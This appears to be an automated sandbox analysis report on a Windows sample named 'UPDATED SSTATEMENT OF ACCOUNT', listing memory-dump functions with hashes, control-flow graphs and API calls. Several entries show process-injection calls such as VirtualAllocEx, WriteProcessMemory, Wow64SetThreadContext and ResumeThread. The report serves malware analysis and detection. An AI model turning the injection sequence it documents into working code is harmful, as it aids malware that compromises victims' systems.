                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID: <3Z
                                              • API String ID: 2289755597-3925590025
                                              • Opcode ID: 0ee65d15a22c8f00f51df1a85000b3362e3eab5d156ca3bcb592db71bcf52d2c
                                              • Instruction ID: b5c5c8a8b150434a57be408efcc8eba1a60d002476db9eedb6a1813bc6e9c564
                                              • Opcode Fuzzy Hash: 0ee65d15a22c8f00f51df1a85000b3362e3eab5d156ca3bcb592db71bcf52d2c
                                              • Instruction Fuzzy Hash: 3F41CFB1C0071DCBDB24CFA9C884BCDBBB5BF49714F20815AD408AB255DB756946CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0186449C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 232 186449c-18659d9 CreateActCtxA 235 18659e2-1865a3c 232->235 236 18659db-18659e1 232->236 243 1865a3e-1865a41 235->243 244 1865a4b-1865a4f 235->244 236->235 243->244 245 1865a60 244->245 246 1865a51-1865a5d 244->246 248 1865a61 245->248 246->245 248->248
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 018659C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID: <3Z
                                              • API String ID: 2289755597-3925590025
                                              • Opcode ID: e29cfec77b60b13fdca7062ff672806528edd3d6ade7d4a4568351b55ea26714
                                              • Instruction ID: 3ae0c1775aa4ff4a31f7263acbbbb9b9b2bf4653b5416628ddfd215dd0d8a272
                                              • Opcode Fuzzy Hash: e29cfec77b60b13fdca7062ff672806528edd3d6ade7d4a4568351b55ea26714
                                              • Instruction Fuzzy Hash: D141C0B0C0071DCFDB24CFAAC884B9EBBB5BF49714F20816AD508AB255DB756A45CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017892A8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 259 17892a8-17892f6 261 17892f8-1789304 259->261 262 1789306-1789345 WriteProcessMemory 259->262 261->262 264 178934e-178937e 262->264 265 1789347-178934d 262->265 265->264
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01789338
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID: <3Z
                                              • API String ID: 3559483778-3925590025
                                              • Opcode ID: 654c87f48d8008e5fa995da789bb4591523141d126319877277c1eaa21463ab6
                                              • Instruction ID: 12a22cfd65cdaacdb6c909a11b113175262d743674bb286e44e01c4be6c536f8
                                              • Opcode Fuzzy Hash: 654c87f48d8008e5fa995da789bb4591523141d126319877277c1eaa21463ab6
                                              • Instruction Fuzzy Hash: 83212A759003499FDB10DFA9C881BEEBBF5FF88314F108429E918A7240D7789540CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017892A7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 249 17892a7-17892f6 251 17892f8-1789304 249->251 252 1789306-1789345 WriteProcessMemory 249->252 251->252 254 178934e-178937e 252->254 255 1789347-178934d 252->255 255->254
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01789338
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID: <3Z
                                              • API String ID: 3559483778-3925590025
                                              • Opcode ID: b5a72f6585a7b7627f71a43f7b77e5cf9cca19ffb4b5ead0baa589e5c1ab9f36
                                              • Instruction ID: 38f69817a3302078157a2667d732e8bbd3e86fde7c7ce40b75ed91795c05c2a8
                                              • Opcode Fuzzy Hash: b5a72f6585a7b7627f71a43f7b77e5cf9cca19ffb4b5ead0baa589e5c1ab9f36
                                              • Instruction Fuzzy Hash: DC2127759003499FDF10DFA9C881BEEBBF1FF88314F10842AE919A7240C7789945CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01789108 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 269 1789108-178910a 270 178910c 269->270 271 178910d-178915b 269->271 270->271 273 178916b-178919b Wow64SetThreadContext 271->273 274 178915d-1789169 271->274 276 178919d-17891a3 273->276 277 17891a4-17891d4 273->277 274->273 276->277
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0178918E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID: <3Z
                                              • API String ID: 983334009-3925590025
                                              • Opcode ID: 4bda878bfaf8ae18ed13ed19ee57014c778bfff3681c39ae5389a8c15562c234
                                              • Instruction ID: a5e0ed05d6e01d28f71d6b9c2c7a64479807301ed2d3abb5275319f46ad87b84
                                              • Opcode Fuzzy Hash: 4bda878bfaf8ae18ed13ed19ee57014c778bfff3681c39ae5389a8c15562c234
                                              • Instruction Fuzzy Hash: 3C213771D043098FDB10DFAAC4857EEFBF4EF88624F14842AD619A7241CB799945CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0186D2F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 281 186d2f9-186d394 DuplicateHandle 282 186d396-186d39c 281->282 283 186d39d-186d3ba 281->283 282->283
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0186D387
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID: <3Z
                                              • API String ID: 3793708945-3925590025
                                              • Opcode ID: 1024e7580f75fe2dbaf820e7371e3eef385287b70b8353b47b53436bfe628e7c
                                              • Instruction ID: 78832bebf4c5269d52a1fe469a11725005ad7bd6f4679268c4bb42383e343266
                                              • Opcode Fuzzy Hash: 1024e7580f75fe2dbaf820e7371e3eef385287b70b8353b47b53436bfe628e7c
                                              • Instruction Fuzzy Hash: 2521E5B5900249DFDB10CFAAD984AEEBBF5EB48320F14855AE914A7310D378A954CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01789110 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 286 1789110-178915b 288 178916b-178919b Wow64SetThreadContext 286->288 289 178915d-1789169 286->289 291 178919d-17891a3 288->291 292 17891a4-17891d4 288->292 289->288 291->292
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0178918E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID: <3Z
                                              • API String ID: 983334009-3925590025
                                              • Opcode ID: b48f240bb4fd01521c31a413044e72c0df99aa20922e530aa09afa40fcd3b8d4
                                              • Instruction ID: 5bdcf2ecd1a7ad9abc7580e3c215507b12b82fef3fa1a542e649c2a8b4d130fb
                                              • Opcode Fuzzy Hash: b48f240bb4fd01521c31a413044e72c0df99aa20922e530aa09afa40fcd3b8d4
                                              • Instruction Fuzzy Hash: A6210771D043098FDB10DFAAC8857AEFBF4EF88624F14842AD519A7240DB78A945CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01789398 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 304 1789398-1789425 ReadProcessMemory 307 178942e-178945e 304->307 308 1789427-178942d 304->308 308->307
                                              APIs
                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 01789418
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID: <3Z
                                              • API String ID: 1726664587-3925590025
                                              • Opcode ID: 0911fef0d1698ddd12da6998357d4d271230a5d8adc1641dfb97560d633ea13f
                                              • Instruction ID: 5a697db7ba54b7b03e3e028ef2a42a8bae2307013ecc231936e55896448699c4
                                              • Opcode Fuzzy Hash: 0911fef0d1698ddd12da6998357d4d271230a5d8adc1641dfb97560d633ea13f
                                              • Instruction Fuzzy Hash: 602128719003499FDB10DFAAC881AEEFBF5FF88320F10842AE518A7240C7799500CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01789397 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 296 1789397-1789425 ReadProcessMemory 299 178942e-178945e 296->299 300 1789427-178942d 296->300 300->299
                                              APIs
                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 01789418
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID: <3Z
                                              • API String ID: 1726664587-3925590025
                                              • Opcode ID: 0bb8b7d69316af02c2b15f163dd2d3517063b6d9bd6858fb72725391dcfa5b3c
                                              • Instruction ID: 682cb40525df2d8ae3bab164ca841ce2012f24883c9d8e0294e9efc5fd1ffc97
                                              • Opcode Fuzzy Hash: 0bb8b7d69316af02c2b15f163dd2d3517063b6d9bd6858fb72725391dcfa5b3c
                                              • Instruction Fuzzy Hash: 9A212875D003499FDB10DFAAC881AEEFBF1FF88320F10842AE519A7240C7799501CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0186D300 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 312 186d300-186d394 DuplicateHandle 313 186d396-186d39c 312->313 314 186d39d-186d3ba 312->314 313->314
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0186D387
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID: <3Z
                                              • API String ID: 3793708945-3925590025
                                              • Opcode ID: 59e5b6aef635420603d60cb77f13dccab8f2b2270437a0e5e5ad6f0f81224459
                                              • Instruction ID: 2deb14e23d85802b954adb27af5221195373bc6d39098711ac03eab1404c05e1
                                              • Opcode Fuzzy Hash: 59e5b6aef635420603d60cb77f13dccab8f2b2270437a0e5e5ad6f0f81224459
                                              • Instruction Fuzzy Hash: 8E21E6B5900248DFDB10CF9AD984ADEFFF8EB48320F14845AE914A7310D374A954CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0186B019 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0186B086
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID: <3Z
                                              • API String ID: 4139908857-3925590025
                                              • Opcode ID: b164b9cce8a8e8ecf06d3856da1bd0b25507c1f2a3d80778b6b639cdb43d80cf
                                              • Instruction ID: 36b9f568f8de8a4f5c26bc395c1334694dd592fcf9837c9397ea6c7e90617bcc
                                              • Opcode Fuzzy Hash: b164b9cce8a8e8ecf06d3856da1bd0b25507c1f2a3d80778b6b639cdb43d80cf
                                              • Instruction Fuzzy Hash: 572145B5D00749CFCB20CFAAD4046DEFBF4AB89718F14855AC529A7211C375664ACFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0186A870 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0186B101,00000800,00000000,00000000), ref: 0186B312
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: <3Z
                                              • API String ID: 1029625771-3925590025
                                              • Opcode ID: fd31164560b4db90f5e222808ce27055a71f3017a036a5164e7c2966536326e4
                                              • Instruction ID: 0a0cd25454c93c76157d04c8287020b075444e383152584fc4f0029cbf675d4d
                                              • Opcode Fuzzy Hash: fd31164560b4db90f5e222808ce27055a71f3017a036a5164e7c2966536326e4
                                              • Instruction Fuzzy Hash: 461117B69003498FDB10CF9AD444A9EFBF8EB88314F10845AD915A7300C375A545CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0186B2A1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0186B101,00000800,00000000,00000000), ref: 0186B312
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: <3Z
                                              • API String ID: 1029625771-3925590025
                                              • Opcode ID: 48f940e090eb187ffd8f633f3e3dd7955fe9aeff5fd5423857a73e42e8ab5333
                                              • Instruction ID: 1c83f6b68d3f0cf23078145f6be627786cecbbad11c11a370595e85e654a1575
                                              • Opcode Fuzzy Hash: 48f940e090eb187ffd8f633f3e3dd7955fe9aeff5fd5423857a73e42e8ab5333
                                              • Instruction Fuzzy Hash: 171126B6D042498FDB10CFAAC444ADEFBF8EB88724F10845AD919A7300C375A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017891E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01789256
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: <3Z
                                              • API String ID: 4275171209-3925590025
                                              • Opcode ID: c824a0fc05775e337fde22e8a2c7980514148301b3ca7ac9b273b7cc7b5030da
                                              • Instruction ID: 6b486ebf610dbbd21c38a2cbb8873f14736e59e1b8a706e6c9eb33e053428e62
                                              • Opcode Fuzzy Hash: c824a0fc05775e337fde22e8a2c7980514148301b3ca7ac9b273b7cc7b5030da
                                              • Instruction Fuzzy Hash: 971156719042499FDB10DFAAC844BEEFFF5EF88720F108419E619A7250C775A500CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017891E7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01789256
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: <3Z
                                              • API String ID: 4275171209-3925590025
                                              • Opcode ID: 15a81b7eaa832a8cd9d395b1a2b08a754d694db4c36ee34baf61913ff1b419d2
                                              • Instruction ID: 4460baa4cc5780d851ca9f40e106cbf97fa71d291a91c90a2f018384f8f5b7bc
                                              • Opcode Fuzzy Hash: 15a81b7eaa832a8cd9d395b1a2b08a754d694db4c36ee34baf61913ff1b419d2
                                              • Instruction Fuzzy Hash: B81144759042499FDB10DFAAC844AEEBFF5AF88320F148419E519A7250C7759500CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01789058 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID: <3Z
                                              • API String ID: 947044025-3925590025
                                              • Opcode ID: ad1137d23c73136756901679dcc4c0288c7b25fab91524aa6cf3dd9f329d9824
                                              • Instruction ID: 2bd273527bbc2ebab3f6baf2751273c1319e23df8624ca6716721087ee74712b
                                              • Opcode Fuzzy Hash: ad1137d23c73136756901679dcc4c0288c7b25fab91524aa6cf3dd9f329d9824
                                              • Instruction Fuzzy Hash: 0A1158719003498FDB20DFAAC4457EEFFF4EF88724F20881AD619A7240CB79A505CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01789060 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID: <3Z
                                              • API String ID: 947044025-3925590025
                                              • Opcode ID: 57e7851e74bb2ffb50d9ef0b20e4bb882e4ce855a5d1394d6aff500c91d4674b
                                              • Instruction ID: 8221e9632471f5c5cebf00d8b42038cf3233413ab9efbee14674204f7a731094
                                              • Opcode Fuzzy Hash: 57e7851e74bb2ffb50d9ef0b20e4bb882e4ce855a5d1394d6aff500c91d4674b
                                              • Instruction Fuzzy Hash: EA116A71D003498FDB10DFAAC4457EEFBF4EF88724F108419D519A7240CB79A500CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0178905F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID: <3Z
                                              • API String ID: 947044025-3925590025
                                              • Opcode ID: f9aa89edb3da7653e82a1676eb49e121af53c1778dc674893e2bfd676685de19
                                              • Instruction ID: 9f4960d3eda5ec74f2181f91dd487d489c6d2d9545728d879a5c546c2cc8d796
                                              • Opcode Fuzzy Hash: f9aa89edb3da7653e82a1676eb49e121af53c1778dc674893e2bfd676685de19
                                              • Instruction Fuzzy Hash: 0B115571D002498FDB20DFAAC4457EEFBF4EF88724F24885AD519A7240CB79A905CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0186B020 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0186B086
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID: <3Z
                                              • API String ID: 4139908857-3925590025
                                              • Opcode ID: 741e7ac5d076775b9ac51579ba18863da8508afd5e47d0ea589dc34349c58694
                                              • Instruction ID: 40a293a051e429df9eacdb69283c0f7c6c575b2df53dbc9147a65396ec3a42eb
                                              • Opcode Fuzzy Hash: 741e7ac5d076775b9ac51579ba18863da8508afd5e47d0ea589dc34349c58694
                                              • Instruction Fuzzy Hash: 881102B5D003498FDB10CF9AC444A9EFBF8AB88724F10845AD528A7210C379A645CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0178ACD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0178DF6D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID: <3Z
                                              • API String ID: 410705778-3925590025
                                              • Opcode ID: fe6f9fb2702298ce2481c0136265a500122ca866274da6e83117ca59ce2d149e
                                              • Instruction ID: 67e4128ca31c28a0d0a130f703fe5c4ebdda337bb3bb720d5ce138067ad1d428
                                              • Opcode Fuzzy Hash: fe6f9fb2702298ce2481c0136265a500122ca866274da6e83117ca59ce2d149e
                                              • Instruction Fuzzy Hash: 911103B5804349DFDB20DF9AD844BDEFBF8EB48720F10845AE918A7240C375A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 014DD4C4 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138242115.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14dd000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dc984597d670767dadc36ca76f6f6919d4d7790aa3f0812cbe18de264bd2af95
                                              • Instruction ID: 34eae1174505d6c5571ab42c2e299af94f20373499fe579eaa7d1edc333db372
                                              • Opcode Fuzzy Hash: dc984597d670767dadc36ca76f6f6919d4d7790aa3f0812cbe18de264bd2af95
                                              • Instruction Fuzzy Hash: 9A210672900240EFDF05DF54D9E0B27BFA5FB88718F24C56AD9050B2A6C336D456CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 014DD3D8 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138242115.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14dd000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8827ae680acf94dcadcf39c14ed110b287168168216aac58a5a8e8d531bcb24
                                              • Instruction ID: 12475c97446645b453fe7e11127a8e45cdfbbab49976fe00ac845b4f859bea17
                                              • Opcode Fuzzy Hash: b8827ae680acf94dcadcf39c14ed110b287168168216aac58a5a8e8d531bcb24
                                              • Instruction Fuzzy Hash: C821F472900204DFDF05DF94D9C0B56BFA5FB88324F24C17ED9090B2A6C336E456CAA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 014ED01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138341810.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14ed000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7cf260496a8ab8c0a6c04de059f9b0dd991fb5ce68526982e87f012baa095e21
                                              • Instruction ID: f0d35f05c9187d15e96cd6017cc036735bc99f0a568b0e811fe74781bb0bb1ed
                                              • Opcode Fuzzy Hash: 7cf260496a8ab8c0a6c04de059f9b0dd991fb5ce68526982e87f012baa095e21
                                              • Instruction Fuzzy Hash: 572125B1904200DFDB15DF54D988B16BFE1FB88319F28C56ED90A0B366C336D407CA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 014ED1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138341810.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14ed000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 64f3c6c8b2c450ca6e0f2866a7021e0dc1b932f3f8ee7d234fe3d93fdcb042e6
                                              • Instruction ID: 5e967e628aa3fa8577a430f86520607cd94fe9dc79a1e553bcb878756eca49e1
                                              • Opcode Fuzzy Hash: 64f3c6c8b2c450ca6e0f2866a7021e0dc1b932f3f8ee7d234fe3d93fdcb042e6
                                              • Instruction Fuzzy Hash: C9213771904200EFDB01DF94D9C8B16BBE1FB88325F20C56ED9094B3A2C336D406CA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 014ED006 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138341810.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14ed000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11ea3c3ff1eef16fbe9255a0a0e9710a1d85e7eefad0c0ac6ecc9db8d91979d4
                                              • Instruction ID: 669540cfa0ffb0144c71c4a12b87b8f2326cd4fcc40190f943a978629f4cab04
                                              • Opcode Fuzzy Hash: 11ea3c3ff1eef16fbe9255a0a0e9710a1d85e7eefad0c0ac6ecc9db8d91979d4
